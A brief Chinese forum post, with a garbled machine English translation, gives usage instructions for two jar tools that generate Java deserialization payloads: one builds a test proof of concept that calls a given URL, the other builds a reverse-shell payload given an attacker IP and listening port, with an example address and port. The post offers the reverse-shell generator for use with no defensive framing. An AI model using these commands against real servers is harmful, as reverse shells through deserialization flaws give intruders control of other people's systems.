Java反序列化生成Payload
Java反序列化生成Payload,可反弹shell和测试POC。用法如下:Java环境自行安装生成测试Payloadjava-jarmakepoc.jar恳求的URLpayload名如:java-jarmakepoc.jarheysec.org/xxooxxooxxoo.txtD:\\java\\shellpayload生成反弹shelljava-jarmakeshell.jar你的IP监听端口payload名如:java-jarmakeshell.jar202.112.221.328888D:\\java\\shellpayload(Java deserialization generates Payload, which can rebound the shell and test POC. The usage is as follows: The Java environment installs and generates the test Payloadjava jarmakepoc. jar requested URL Payload name, such as: java jarmakepoc. jarheysec. org/xxooxxooxxooxxoo. txt D: java shellpayload generates bounce shelljava jarmakeshell.jar Your IP listening port Payload name, such as: java jarmakeshell. jar 202.112.221.32888D: java shellpayload)
页:
[1]